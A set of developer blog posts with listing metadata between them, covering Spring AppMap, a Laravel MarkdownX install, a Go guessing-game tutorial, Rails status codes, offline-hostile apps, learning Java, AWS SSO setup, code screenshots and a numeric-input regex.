A Spring Controller is a pretty complex mixture of methods and annotations - even the simple Pet Clinic “OwnerController” has at least 5 different annotations used in multiple different ways. Code like this is powerful, but unlike “normal” procedural or functional code, there’s no information in the code about how the functions are used, how they fit together, or which ones are used in a particular use case.
```java
@Controller
class OwnerController {
private static final String VIEWS_OWNER_CREATE_OR_UPDATE_FORM = "owners/createOrUpdateOwnerForm";
private final OwnerRepository owners;
private VisitRepository visits;
public OwnerController(OwnerRepository clinicService, VisitRepository visits) {
this.owners = clinicService;
this.visits = visits;
}
@InitBinder
public void setAllowedFields(WebDataBinder dataBinder) {
dataBinder.setDisallowedFields("id");
}
@GetMapping("/owners/new")
public String initCreationForm(Map<String, Object> model) {
Owner owner = new Owner();
model.put("owner", owner);
return VIEWS_OWNER_CREATE_OR_UPDATE_FORM;
}
@PostMapping("/owners/new")
public String processCreationForm(@Valid Owner owner, BindingResult result) {
if (result.hasErrors()) {
return VIEWS_OWNER_CREATE_OR_UPDATE_FORM;
}
else {
this.owners.save(owner);
return "redirect:/owners/" + owner.getId();
}
}
@GetMapping("/owners/find")
public String initFindForm(Map<String, Object> model) {
model.put("owner", new Owner());
return "owners/findOwners";
}
```
The `org.springframework.web` is a package that orchestrates these snippets of Java code based on their annotations.
To get a map of how an Owner request works, I’ll run the Pet Clinic with remote recording enabled, then use the AppMap extension for IntelliJ to create a recording of a web request. This is a bit easier to watch than to explain, so check out the video above for a walkthrough of all this.
To recreate this yourself, check out the appmap-e2e branch of
[https://github.com/land-of-apps/spring-petclinic](https://github.com/land-of-apps/spring-petclinic)
To record and review your own runtime code maps directly in your code editor, download the free AppMap plugin for JetBrains here: [https://plugins.jetbrains.com/plugin/16701-appmap](https://plugins.jetbrains.com/plugin/16701-appmap) | kgilpin |
807,981 | MarkdownX Editor 🎉 | Our MarkdownX editor is officially live and available on the DevDojo. It's also available for you to... | 0 | 2021-08-30T12:41:35 | https://devdojo.com/tnylea/markdownx-editor | markdown, laravel, tailwindcss, saas | Our MarkdownX editor is officially live and available on the DevDojo. It's also available for you to use in your [TallStack](https://tallstack.dev) applications 🍻.
If this is your first time hearing about the [MarkdownX Editor](https://devdojo.com/markdownx), continue reading to learn more about how it can make writing in Markdown easier and more fun than ever before.
> MarkdownX become top 4 product of the day on [ProductHunt](https://www.producthunt.com/posts/markdownx) 😻
## What is MarkdownX
MarkdownX is like a `<textarea>` element with super powers ✨. It is a text editor with a beautiful interface that makes it easy for users to write in Markdown. The component has a pretty sweet dropdown that allows you to easily upload images, add lists, embed videos, and so much more!
A month ago we posted a tweet about a new editor we were building and it got a pretty huge response with nearly 500 likes and 50 retweets 🤯
[](https://twitter.com/tnylea/status/1419059051430825986)
That set things in motion and we started working on a version that could be used with any [Tallstack](https://tallstack.dev) application. 🙌.
I'll show you the steps below 👇 on how to install this in a new Tallstack app.
## 1. 🔧 Create a new Laravel App
The first step is creating a new Laravel application. If you already have an existing Tallstack application, you can skip ahead to step 3.
```
laravel new mdx
```
In this example, I'll install a new laravel app in a folder named `mdx`.
Then, go into that directory `cd mdx`, and we can move to the next step.
## 2. 🔩 Installing the Tallstack Pre-set
The Tallstack preset allows us to add [TailwindCSS](https://tailwindcss.com), [Alpine](https://alpinejs.dev), and [Livewire](https://laravel-livewire.com) in our new application with a few simple commands. You can find that preset here: [https://github.com/laravel-frontend-presets/tall](https://github.com/laravel-frontend-presets/tall).
Let's run those commands in our new application:
```
composer require livewire/livewire laravel-frontend-presets/tall
php artisan ui tall
npm install
npm run dev
```
After we have run those commands, we should be able to visit our new site:

And we should have a new [Tallstack](https://tallstack.dev) application in front of us.
> note: if you get an application key error, you may also need to run `php artisan key:generate`.
Next up, we'll be moving the component files to our new application.
## 3. 🧩 Adding the MarkdownX Editor
Adding this component to your project is literally as easy as **1**, **2**, **3**. Because that's how many files the MarkdownX editor includes. Here are those files:
1. **Controller** - app/Http/Livewire/MarkdownX.php
2. **View** - resources/views/livewire/markdown-x.blade.php
3. **Config** - config/markdownx.php
After downloading a copy of the latest MarkdownX editor, you will need to move those files 👆 to their appropriate location in your Laravel application.
> Note: make sure to run `php artisan storage:link`, if you want to test out image uploading. The MarkdownX storage uses the local public disk by default, but you can change this in the config 😉.
After you have done this, we are now ready to test it out in our new application.
## 🧪 Test out the Editor
To test the editor in our new app we are going to modify the welcome page located at `resources/views/welcome.blade.php`, to look like this:
```
@extends('layouts.app')
@section('content')
<livewire:markdown-x />
@endsection
```
If we visit our application homepage we'll see the editor in front of us 🤘.

We can now drag-and-drop images, add videos, lists, and a bunch of other cool things that make writing more fun and easier than ever before.
Be sure to check out the official new landing page for [MarkdownX here](https://devdojo.com/markdownx) and the [documentation here](https://devdojo.com/markdownx). I hope you find this component useful in your next project, and I hope you continue to build awesome stuff 🤘. See you soon! | bobbyiliev |
808,048 | Build a simple guessing game in Golang. | A complete beginner’s guide Concept The player will guess a number between 0... | 0 | 2021-08-31T11:18:30 | https://dev.to/nagatodev/build-a-simple-guessing-game-in-golang-48ig | go, gamedev, webdev, programming | #A complete beginner’s guide
##Concept
The player will guess a number between 0 and 10. If their guess is correct, they win. Otherwise, the program will give the player a hint to either guess higher or lower depending on the correct number. The player will have three(3) shots at the game; if he guesses incorrectly three(3) times, the game would end.
##Golang
Simply put, [Go](https://golang.org/) is an open-source programming language that makes it easy to build simple, reliable, and efficient software.
In this piece, you will learn how to make a simple guessing game in [Golang](https://golang.org/).
##Getting Started With Golang.
To start with, you will need to install Golang on your computer. If you don’t already have it installed, you can do this from the [Golang website](https://golang.org/).
Once you are done with the installation, open the CMD on Windows, Terminal on Mac, and Linux. Then change directory “cd” to the folder you want to store your guessing game in.
Create the directory for your guessing game
```
mkdir Guess
```
Move into the new Guess directory
```
cd Guess
```
Initialize your project with a go.mod file. Ensure you replace the string ‘username‘ with your Github username.
```
go mod init github.com/username/Guess
```
Create a new file named guess.go
```
touch guess.go
```
You have now successfully installed ‘go’ and also set up your guessing game file.
Now, open the guess.go file with a text/code editor on your device. I use [VS Code](https://code.visualstudio.com/). Windows comes with Notepad pre-installed. Mac OS includes TextEdit. Linux users can use [Vim](https://www.vim.org/). You can also download other text editors like [sublime text](https://www.sublimetext.com/) or [atom](https://atom.io/).
>Now let’s get started with coding

##Creating the Guessing game
The instructions for this tutorial will be included in the code itself as comments. In Golang, you make comments with double forward slashes.
**Note**: A clean code without comments is included below if you just want to jump straight at the game.
```javascript
// The first statement in a go source file must start with a package “name”. All the functions declared in this program become part of the declared package. Go programs start running in the main package. This tells the Go compiler to compile the package as an executable program.
//An Executable simply means a file that contains a program that is capable of being executed or run as a program on your computer.
package main
import (
“fmt” // import the fmt package which allows you to use text
//formatting, reading input & printing output functions
“math/rand” //import the rand package which allows you to
//generate random numbers
“time” // import the package which will provide time functionality to measure time
)
func main() {
fmt.Println(“Game: Guess a number between 0 and 10”)
// This informs the player about how to play the game.
fmt.Println(“You have three(3) tries “)
// generate a random number
source := rand.NewSource(time.Now().UnixNano())
//The default number generator is predictable, so it will produce the same sequence of numbers each time. To produce a varying range of numbers, give it a seed that changes (in this case: time would ensure it changes ). Note that this is not safe to use for random numbers you want to be secret; use crypto/rand for those.
randomizer := rand.New(source)
secretNumber := randomizer.Intn(10)
// generate numbers between 0 and 10 only. If you want to change the range change the value 10 to a higher or lower value
var guess int
// this is one form of declaration in go; you have to add the type of the variable been declared. “var guess” won't work
for try := 1; try <= 3; try++ {
// declaring the conditions for the for loop ; the shorthand form of declaring a variable was used here. Declare and Initialize ‘ := ‘ you declare and assign a value upon declaration. Go will automatically infer the type of the variable since you already assigned a value to it.
fmt.Printf(“TRIAL %d\n”, try)
// print out the number of times the player has made a guess
fmt.Println(“Please enter your number”)
// the program will prompt the player to make a guess and enter a number
fmt.Scan(&guess)
// this function makes it possible for the program to receive the input
if guess < secretNumber {
// if the guessed number is less than or greater than the correct number; give the player a hint
fmt.Printf(“Sorry, wrong guess ; number is too small\n “)
} else if guess > secretNumber {
fmt.Printf(“Sorry, wrong guess ; number is too large\n “)
} else {
fmt.Printf(“You win!\n”)
break
// Print out "you win" message when the player guesses the correct number
}
if try == 3 {
// if the number of tries is equal to 3, print game over and also the correct number
fmt.Printf(“Game over!!\n “)
fmt.Printf(“The correct number is %d\n”, secretNumber)
break
}
}
}
```
Once you are done editing, save the program. Also, you can change whatever you want in your program. For example, you could increase the guessing range of numbers from 10 to 100. You could change the program’s response to the player’s actions in the printLn() functions. You can do whatever you want, the game is yours now🤗.
##Running Your Program
Open up the terminal of your VS code or command prompt (Windows/Linux) or the terminal (Mac), depending on the choice of text editor you made above. Ensure you are still in the guessing game directory you created above. If you are not, navigate to the guessing game directory using the command below;
```
cd
```
There are two methods that you can use to run your guessing game. **Build or Run**. Use either of the two.
1- *Build*
Type the following command
```
go build guess.go
```
You should see a new file in your guess directory(folder) named ‘‘guess’’
Then run
```
./guess
```
2- *Run*
Type the following command
```
go run guess.go
```
Regardless of the method, you went with above; Your game should be running now. Once your program is running, test it out! Play around with it a few times. Have fun !!
If you have any questions about this tutorial, feel free to drop it as a comment or send me a message on [LinkedIn](www.linkedin.com/in/faruq-abdulsalam) or [Twitter](https://twitter.com/_Ace_II/) and I will try my best to help you out.
Below is a version of the code without comments.
```javascript
package main
import (
“fmt”
“math/rand”
“time”
)
func main() {
fmt.Println(“Game: Guess a number between 0 and 10”)
fmt.Println(“You have three(3) tries “)
source := rand.NewSource(time.Now().UnixNano())
randomizer := rand.New(source)
secretNumber := randomizer.Intn(10)
var guess int
for try := 1; try <= 3; try++ {
fmt.Printf(“TRIAL %d\n”, try)
fmt.Println(“Please enter your number”)
fmt.Scan(&guess)
if guess < secretNumber {
fmt.Printf(“Sorry, wrong guess ; number is too small\n “)
} else if guess > secretNumber {
fmt.Printf(“Sorry, wrong guess ; number is too large\n “)
} else {
fmt.Printf(“You win!\n”)
break
}
if try == 3 {
fmt.Printf(“Game over!!\n “)
fmt.Printf(“The correct number is %d\n”, secretNumber)
break
}
}
}
```
Bonus: If you are using VS code, you can open the IDE from your terminal by typing this simple command
```
code
```
Note: you must have installed this in your path. To do this, **press CMD + SHIFT + P, type shell command, and select Install code command in path**

| nagatodev |
808,070 | [note]Rails HTTP Code and Symbol mapping | ... | 0 | 2021-08-30T16:00:04 | https://dev.to/kevinluo201/note-rails-http-code-and-symbol-mapping-5ckl | ## References
* [Rack::Utils::HTTP_STATUS_CODES](https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L492)
* [https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L520](https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L520)
## HTTP status code symbols for Rails
Thanks to Cody Fauser for this list of HTTP responce codes and their Ruby on Rails symbol mappings.
## 1xx Informational
```ruby
100, :continue
101, :switching_protocols
102, :processing
```
## 2xx Success
```ruby
200 :ok
201 :created
202 :accepted
203 :non_authoritative_information
204 :no_content
205 :reset_content
206 :partial_content
207 :multi_status
226 :im_used
```
## 3xx Redirection
```ruby
300 :multiple_choices
301 :moved_permanently
302 :found
303 :see_other
304 :not_modified
305 :use_proxy
307 :temporary_redirect
```
## 4xx Client Error
```ruby
400 :bad_request
401 :unauthorized
402 :payment_required
403 :forbidden
404 :not_found
405 :method_not_allowed
406 :not_acceptable
407 :proxy_authentication_required
408 :request_timeout
409 :conflict
410 :gone
411 :length_required
412 :precondition_failed
413 :request_entity_too_large
414 :request_uri_too_long
415 :unsupported_media_type
416 :requested_range_not_satisfiable
417 :expectation_failed
422 :unprocessable_entity
423 :locked
424 :failed_dependency
426 :upgrade_required
```
## 5xx Server Error
```ruby
500 :internal_server_error
501 :not_implemented
502 :bad_gateway
503 :service_unavailable
504 :gateway_timeout
505 :http_version_not_supported
507 :insufficient_storage
510 :not_extended
``` | kevinluo201 | |
808,080 | In which I am cranky about the urban/rural divide | I just came back from a weeks-long trip to the American West. It was amazing, gorgeous. More... | 0 | 2021-08-30T21:58:14 | https://heidiwaterhouse.com/2021/08/30/in-which-i-am-cranky-about-the-urban-rural-divide/?utm_source=rss&utm_medium=rss&utm_campaign=in-which-i-am-cranky-about-the-urban-rural-divide | bestpractices, industry, life, personal | ---
title: In which I am cranky about the urban/rural divide
published: true
date: 2021-08-30 15:07:00 UTC
tags: Bestpractices,Industry,Life,Personal
canonical_url: https://heidiwaterhouse.com/2021/08/30/in-which-i-am-cranky-about-the-urban-rural-divide/?utm_source=rss&utm_medium=rss&utm_campaign=in-which-i-am-cranky-about-the-urban-rural-divide
---
I just came back from a weeks-long trip to the American West. It was amazing, gorgeous.


More pictures at my blogpost: https://heidiwaterhouse.com/2021/08/30/in-which-i-am-cranky-about-the-urban-rural-divide/
<figcaption>What I did on my summer vacation. Yellowstone, Idaho, Coral Pink Sands, Zion, Bryce Canyon, Monument Valley, Ship Rock</figcaption>
You know what all this beauty has in common? Besides mostly being protected wild areas?
Zero bars of cell phone signal. Or maybe like, two bars, depending on whether there was a mesa in the way. We drove almost all of it on state freeways, not interstates, and there was, let me emphasize, NO SIGNAL.
That’s fine by me. I was taking a vacation and don’t need my phone pestering me all the time. I had even dowloaded a bunch of albums and playlists to stream to the car audio system.
I’m going to call out Amazon Music here, but none of them are good. I used to use Google Music, but I loathe YouTube music’s interface _very slightly_ more than the Amazon interface. And Spotify is fine, but I like actually owning and downloading music instead of streaming it, because I have this silly old-fashioned notion that if I have purchased something and downloaded it, I might want to, you know, provide that to the car.
The process goes like this.
1. Open Amazon Music App
2. Reject Car Mode, because I was the passenger.
3. Reject the offer I get to sign up for Unlimited Whatever Streaming. I get this offer EVERY TIME. There is no way I can find to permanently dismiss it. I do not want to stream my music.
4. Click the Library icon
5. Click the Albums icon
6. Swear and switch into “Offline Music”, because it keeps defaulting me to “Online Music”
7. Select album, say, James – La Petit Mort
8. Sing along
9. Become very startled by the next thing to happen, which is rather than the app thinking “yes, album played, good job me, now I stop”, it says, “I see you have played your own music. I will now construct a STREAMING STATION based on that and attempt to communicate over this-here roaming connection, because I have never considered acting like a music player, I am here to CURATE TASTE.”
10. Everyone in the car with me is subjected to my rant about app developers who have never considered offline mode.
And it wasn’t just the music player — I had trouble finding books I had downloaded to my phone because it evidently wanted to dial home to confirm something? My licenses? And it wasn’t just Amazon. Aura Picture Frame app — very cool, no queuing capabilities. Marriott Bonvoy app — why WOULDN’T anyone want to spend data loading gorgeous pictures of resorts in the Maldives if one was booking a room in St. George, Utah? CovidAwareMN — help, help! I can’t find a signal and I don’t know where we are, alert!
The two apps that did not piss me off were Snapchat, which let me take and queue images without a fuss, and Google Maps, which let me pre-download maps around destinations it thought I might be headed to.
Now, this could be just a whine about how my magical communicator device didn’t do what I wanted, but I think it’s actually a pretty fair indicator of a real problem we have in software development generally, and app development in particular. We assume that everyone has data the way we have data – boundless, essentially free, always on. That streaming is just the new way radio works.
But it’s not! Radio is one-to-many, and what we are building with our always-on assumptions doesn’t map to that. Data is not free. If you look at the cost of downloads in non-US countries, or even in non-metropolitan US, or even for people on pay-as-you-go cell plans, IT’S NOT FREE. It’s expensive. And every time we lazily write a back-and-forth communication as if it were just a database call, we’re costing someone money. Mostly someones who can least afford it.
I was joking on Twitter that I wanted to drop app developers into the middle of the American West for a week and see how they felt about their product then, and hey, it would probably be good for them to get some screen-free time, but the more I thought about it, the more I do want someone to be angry with me. Because when we had to call the EMTs, I was glad we were somewhere with phone signal. And when we checked into a hotel and the volunteer-fire-department alarm was going off, I learned that they couldn’t get reliable pager coverage to summon firefighters. At the risk of sounding catastrophic, global climate change is going to lead to a lot of situations where we need our apps to do basic things without being able to phone home. If my first-aid manual is in PDF, will I be able to access it without hitting Adobe servers?
When we talk about building robust systems, we are thinking about hardware, software, failovers, unavailable humans, mostly normal failures. But this is a normal failure that I never hear us talk about.
PS – I also got in a lot of starwatching. It was marvelously dark, and I was watching for the Leonids and also resenting all the microsatellites. Yes, I know they are supposed to bring internet access to more of the world, but holy wow, they are bright and distracting and maybe we could have thought that through better, design-wise. | wiredferret |
808,251 | 2 anos atrás eu não consegui aprender Java e isso me ensinou a respeitar o meu tempo | Você também pode ouvir esse artigo acessando pelo Pingback Essa semana nas lembranças de stories... | 0 | 2021-09-01T21:19:20 | https://dev.to/jeniblo_dev/2-anos-atras-eu-nao-consegui-aprender-java-e-isso-me-ensinou-a-respeitar-o-meu-tempo-abj | aprendizado, evolucao, dev | > *Você também pode ouvir esse artigo acessando pelo [Pingback](https://pingback.com/jeniblo_dev/2-anos-atras-eu-nao-consegui-aprender-java-e-isso-me-ensinou-a-respeitar-o-meu-tempo)*
Essa semana nas lembranças de stories do Instagram apareceu pra mim essa imagem aí embaixo de dois anos atrás: a primeira vez que eu tentava aprender Java.

Pra quem não sabe entrei na faculdade de Sistemas de Informação em maio/2019 sem nunca ter visto nada de programação na vida, e sim, **eu achava que poderia aprender tudo.** Logo que comecei a ver algumas coisas iniciais já quis aprender direto o Java por ser uma linguagem bastante utilizada e assim comecei a fazer um curso.
**Foi aí que veio minha primeira frustração: eu não consegui entender como funcionavam as coisas direito no Java, não conseguia aprender e a cada aula ia ficando mais aterrorizante.**
Depois de conversar com algumas pessoas mais experientes na área, decidi deixar o Java de lado e focar em melhorar meus conhecimentos em lógica. Depois disso acabei indo pra outras vertentes de estudo e me focando mais em aprender HTML, CSS e JavaScript.
Agora, em junho desse ano, tive a oportunidade de voltar a aprender Java, e bateu aquele medo de não conseguir aprender de novo e de não ser pra mim, mas fui com medo mesmo.
Hoje, dois meses depois de começar a estudar Java, no meu ritmo e respeitando meu tempo de aprendizado, percebi que não era aquela coisa assustadora que foi pra mim há 2 anos, e está sendo super prazeroso esse aprendizado.
Quis contar essa história aqui pois sei que, assim como eu, muitos de vocês já tentaram aprender algo e acabaram se sentindo frustrados por não conseguir avançar e aprender como gostariam e em algum momento acabaram se questionando se realmente estavam no caminho certo ou se aquilo era pra você.
E se tem uma coisa que eu aprendi com isso tudo é: **respeite o seu tempo e não se compare com outras pessoas.** A evolução do aprendizado é contínua e individual, algumas pessoas conseguem aprender mais rápido e acelerando etapas, enquanto outras pessoas precisam ir mais devagar e conhecer melhor as bases, são processos de aprendizado únicos e não existe melhor ou pior.
Talvez o fato de você não estar conseguindo aprender algum conceito ou linguagem agora é porque você precisa mudar o método que está aprendendo, precisa ir mais devagar ou ainda não está pronto para aprender aquilo e precisa de mais conhecimentos de base.
Me conhecer e entender como meu aprendizado funciona me ajudou a me cobrar menos e entender que avançar um passo de cada vez e no meu tempo, também vai me levar onde eu desejo chegar. Que naquele momento há 2 anos, quando tentei aprender Java da primeira vez, eu ainda não estava preparada pra aprender esse conteúdo e que não tem nada de errado com isso.
E vocês, já tentaram aprender algum conteúdo e não deu muito certo? Me conta aqui nos comentários como foi =)
<hr>
### 🎧 Bora trocar uma ideia?
* [Instagram](https://www.instagram.com/jeniblo_dev/)
* [Twitter](https://twitter.com/jeniblo_dev)
* Fique por dentro de todos os conteúdos pelo [Polywork](https://www.polywork.com/jeniblo_dev)
| jeniblo_dev |
808,252 | How to configure AWS SSO enabling access for a user in two different AWS accounts using a customized user-portal | “Challenges faced to find the solution of how to configure AWS SSO enabling access for a user in two... | 0 | 2021-08-30T17:33:44 | https://dev.to/aws-builders/how-to-configure-aws-sso-enabling-access-for-a-user-in-two-different-aws-accounts-using-a-customized-user-portal-5ao5 | awss3, awssso, awsrds, security | “Challenges faced to find the solution of how to configure AWS SSO enabling access for a user in two different AWS accounts using a customized user-portal”. I have checked different ways so that I can be able to access different accounts in the simplest way without having to login to all accounts again and again. I got the solution as users are able to login the accounts once using the switch role for IAM users feature of AWS or using AWS Single Sign-On service. The AWS Single Sign-On service is a short-term access or we can say it gives a user session-based access so the access key and secret key also get changed automatically. As per my requirement, I have chosen AWS Single Sign-On service. In terms of cost, the AWS Single Sign-On service has no charges.
AWS Single Sign-On (AWS SSO) is a cloud service that allows you to grant your users access to AWS resources, such as Amazon EC2 instances, across multiple AWS accounts. By default, AWS SSO now provides a directory that you can use to create users, organize them in groups, and set permissions across those groups. You can also grant the users that you create in AWS SSO permissions to applications such Salesforce, Box, and Office 365. AWS SSO and its directory are available at no additional cost to you. To learn more, read the [AWS Single Sign-On](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html).
In this post, you will get to know how to configure AWS SSO enabling access for a user in two different AWS accounts using a customized user-portal. Here I have taken two aws accounts, s3 bucket and rds database. I have enabled SSO with the creation of user, group and permission sets(s3fullaccess and rdsfullaccess). Users are able to access the accounts with s3 and rds services with appropriate permissions using the user portal URL.
#Prerequisites
You’ll need an Amazon Simple Storage Service and Amazon Relational Database Service for this post. [Getting started with Amazon Simple Storage Service](https://aws.amazon.com/s3/getting-started/) provides instructions on how to create a bucket in a simple storage service. [Getting started with Amazon Relational Database Service](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_GettingStarted.htm) provides instructions on how to create a relational database. You’ll also need [AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/userguide/installing.html) (AWS CLI) installed and configured on your machine. For this blog, I assume that I have two AWS accounts in an organization(root account and sub-account), S3 bucket with file and RDS database.
#Architecture Overview
Diagram

The architectural diagrams show the overall deployment architecture with AWS S3, AWS RDS, AWS Single Sign-On and AWS Accounts.
#Solution overview
The blog post consists of the following phases:
1. Setup of identity source settings in aws single sign-on console
2. Create a User, group and set a permission set on group in aws single sign-on
3. Verification of invitation for sso by users and login to aws accounts using MFA authentication with sso service
4. Testing of access to the account for users from the management console and command line
I have two AWS accounts in an organization(root account and sub-account), S3 bucket with file and RDS database as below →




##Phase 1: Setup of identity source settings in aws single sign-on console
1. In the AWS Single Sign-On console, click on the aws sso option to enable it.



2. Choose your identity source option, In identity source select aws sso option. Other options are also available as active directory and external identity provider. Click on the customize button and give the user portal URL of choice.





3. You can also set the multi-factor authentication settings as per your requirement. I have set every time they sign in with both security authentication MFA types. And set the option as required to sign in with MFA only.



##Phase 2: Create a User, group and set a permission set on group in aws single sign-on
1. In the dashboard click on users option, I have added a user named as gargee with email verification option and give required details of user such as email id, first name, last name... And leaving other options as default.



2. Click on the create group option, specify the group name as S3andRDSaccess and then create it. Then select the group and add a user in it. User "Gargee Bhatnagar" has been successfully added to the group.



3. Goto AWS Accounts option, click on the permission sets tab then create a permission set as custom named as S3andRDSaccess with 12 hours session duration and AWS managed policies(S3fullaccess and RDSfullaccess) and create it.








4. In the AWS Organization tab, assign users all existing AWS accounts and assign a permission set to the group.




##Phase 3: Verification of invitation for sso by users and login to aws accounts using MFA authentication with sso service
1. In the mail, accept the invitation and then access the user portal URL in the browser. Set a new password for user login and configure an MFA on users sso login.








2. Click on aws account, you can see the access permissions of users with console and command line links.


##Phase 4: Testing of access to the account for users from the management console and command line
1. For gargee user, check access for s3 and rds from the console. EC2 console cannot be accessible for gargee as showing API error.





2. For other user, check access for s3 and rds from the console as nothing is displayed due to no data being there in s3 and rds.



3. For gargee user, access from command line. Run command “aws configure sso” in terminal and give required details as URL and region. Give MFA and authenticate the request for command line access.






4. You can see the two accounts available with roles on it. Input the region, output format and profile name. I have set up a profile for gargee and other users. You can list the s3 bucket using the “aws s3 ls --profile gargee-access” command for users with a profile name. You can even list rds using the “aws rds describe-db-instances --db-instance-identifier database-testsso --profile gargee-access” command.
You can even check configuration and expiration of a session with access and secret key in folders of aws config files.














5. After deletion of an aws sso, you are not able to access the user portal URL.


#Clean-up
Delete the environment as: Single Sign-On Service, RDS, S3.
#Pricing
I review the pricing and estimated cost of this example -
For Relational Database Service →
Cost for USD 0.024 per db.t2.micro instance hour (or partial hour) running MySQL = $0.05
For Simple Storage Service →
Cost of APS3-Requests = $0.00
No charges for AWS Single Sign-On Service.
Total Cost = $(0.05+0.00) = $0.05
#Summary
In this post, I have shown you how to configure AWS SSO enabling access for a user in two different AWS accounts using a customized user-portal.
For more details on single sign-on service, Checkout Get started with AWS Single Sign-On, open the [AWS Single Sign-On Service console](https://ap-south-1.console.aws.amazon.com/singlesignon/home?region=ap-south-1#/). To learn more, read the [AWS Single Sign-On documentation](https://docs.aws.amazon.com/singlesignon/?id=docs_gateway).
Thanks for reading!
Connect with me: [Linkedin](https://www.linkedin.com/in/gargee-bhatnagar-6b7223114) | bhatnagargargee |
256,261 | Create a new Promise in JavaScript? | This video covers how to create a new Promise in JavaScript and what are the states of a Promise. Yo... | 0 | 2020-03-20T16:30:27 | https://bonsaiilabs.com/create-promise | javascript, react, node, codenewbie | ---
canonical_url: https://bonsaiilabs.com/create-promise
---
This video covers how to create a new Promise in JavaScript and what are the states of a Promise.
You can access the code at https://bonsaiilabs.com/create-promise/
{% youtube RK_0h-slUIA %}
Subscribe for more videos on JavaScript with Visualization: https://www.youtube.com/channel/UC0yZBnRsD9JRqLXBkfGym0Q?sub_confirmation=1
| deekshasharma25 |
310,542 | Create Your Own Elegant Code Screenshots with Carbon | I often get asked how I make "those great screenshots" of my code that I share on social media and here on dev.to. The answer is simple: I use the website https://carbon.now.sh! | 0 | 2020-04-16T11:01:08 | https://dev.to/nas5w/create-your-own-elegant-code-screenshots-with-carbon-357l | productivity, career, javascript, programming | ---
title: Create Your Own Elegant Code Screenshots with Carbon
published: true
description: I often get asked how I make "those great screenshots" of my code that I share on social media and here on dev.to. The answer is simple: I use the website https://carbon.now.sh!
tags: productivity, career, javascript, programming
cover_image: https://dev-to-uploads.s3.amazonaws.com/i/3t1jn828shr1qn4xh3ew.png
---
I often get asked how I make "those great screenshots" of my code that I share on social media and here on dev.to. The answer is simple: I use the website https://carbon.now.sh!
Furthermore, Carbon has a VS Code extension that, when used, will send your currently-selected code over to the Carbon website ready for screenshotting.
Here's an example screenshot:

And here's one of the tweet's I've shared that has performed well, largely due to the quality of the screenshot:
{% twitter 1248757906662711301 %}
You too can share tips and code clearly using Carbon!
Happy learning/teaching! | nas5w |
329,081 | Been a busy boy | I've just had a busy old weekend and managed to get my digital counter working with CSS animations.... | 0 | 2020-05-11T15:29:56 | https://drmsite.blogspot.com/2019/07/been-busy-boy.html | css, graphics, html, javascript | ---
title: Been a busy boy
published: true
date: 2019-07-29 11:02:00 UTC
tags: CSS,Graphics,HTML,JavaScript
canonical_url: https://drmsite.blogspot.com/2019/07/been-busy-boy.html
---
[](https://4.bp.blogspot.com/-ZkIlr2bwj6s/XT7SHREGzNI/AAAAAAAAhps/6Rnn5ptGlsIz55i-84rNs9DjutImslYOgCLcBGAs/s1600/2019-07-29_1155.png)
I've just had a busy old weekend and managed to get my digital counter working with CSS animations. I have been wanting to do this for ages but haven't had the time to research the technique correctly. It's [here](https://annoyingmouse.js.org/WireFrameJS/000-MISCELLANEOUS/COUNTER/), and I'm quite pleased with the result despite it taking a shed load of tweaking to get right.
I've also caught up some on updated p5 implementations from WireFrame, and I've added three projects to the [site hosted by GitHub](https://annoyingmouse.js.org/WireFrameJS/), all to do with mazes. The [first](https://annoyingmouse.js.org/WireFrameJS/018-MAZE/) uses an algorithm to generate a maze, and I got lost in the [C implementation](https://github.com/Wireframe-Magazine/Wireframe18/tree/master/maze-algorithms) but found [a set of videos](https://www.youtube.com/watch?v=HyK_Q5rrcr4) from [The Coding Train](https://thecodingtrain.com/) that went through the steps required. I've pretty much stolen them but made them a little more ES6y. The [second](https://annoyingmouse.js.org/WireFrameJS/018-MONSTERMAZE/) draws the view of a character navigating a maze, and I'm impressed with the cheating in terms of the images used to illustrate the perspective required. The [third](https://annoyingmouse.js.org/WireFrameJS/015-ANT_ATTACK/) and final one also cheats by using images to build up a semi-3D illustration of a landscape and was lots of fun (you can navigate using the arrow keys)! | mouseannoying |
329,546 | In search of the ultimate number regex | I was recently working on a number input field and ran into the age old problem of validating the use... | 0 | 2020-05-07T11:06:30 | https://dev.to/ryandunn/in-search-of-the-ultimate-number-regex-3kk | javascript, ux | I was recently working on a number input field and ran into the age old problem of validating the user input to ensure a valid numerical value. This is simple enough to just validate once the complete value is inputted, but not so much while the user is still typing.
We need the user to be able to input a `-` on the way to typing `-1` and to be able to type `1.` on the way to typing `1.23`, but remove any non-numerical characters smoothly. I was sure this could be accomplished with a single regex and set out to do it.
## Requirements
1. Remove any characters that are not numerals, dots or dashes
2. Remove any dashes not at the beginning of the string
3. Allow one dot, remove any additional dots
This should also result, at least in Javascript with a value that can almost always be correctly formatted with `parseFloat` without any `NaN` hijinks.
## Filtering non-numeric characters
Let's go ahead and try to format this horrible mess into a valid potential numeric value:
``` javascript
const n = "-a[b1-2.cd.-e34--.5*(a67.ac&";
```
The first part of the problem is simple, filter any characters that aren't numbers, dashes or dots:
``` javascript
n.replace(/[^\d.-]/g, ""); // output "-1-2..-34--.567."
```
This looks mysterious if you haven't ever broken it down into pieces before, but I'll explain it bit by bit. We tell our match filter to find every match `/g` from a whitelist group `[ ]` that is not `^` a digit `\n`, a dot `.`, or a dash `-`. We use `replace` to replace all matches with nothing.
Note: normally the dot character would need escaping (`/\./g` matches all dots) but doesn't within the group.
## Removing improper dashes
Next we need to remove any dashes that aren't at the beginning of the string. This is a little more esoteric:
``` javascript
n.replace(/(?!^)-|[^\d.-]/g, ""); // output "-12..34.567."
```
Here we're using a negative lookahead `(?! )` to tell our matcher to fail if it finds the following match at the first-character position `^` and then to match all dashes `-`, ie: all dashes that are not the first character. Then we are using the or operator `|` to tell it to search for that or anything from out previous matcher - anything non digit, dot or dash. Getting closer.
## Removing additional dots
The final problem here is one that unfortunately _is_ solvable in a one-line regex, but not supported by several widely used browsers. We need to use a positive look-behind which isn't supported in Firefox, Safari, or IE11 as of the time of writing. Nevertheless here is the solution which will work in any environment that does support it, courtesy of a colleague of mine:
``` javascript
n.replace(/(?<=\..*)\.|(?!^)-|[^\d\.-]/g, ''); // output "-12.34567"
```
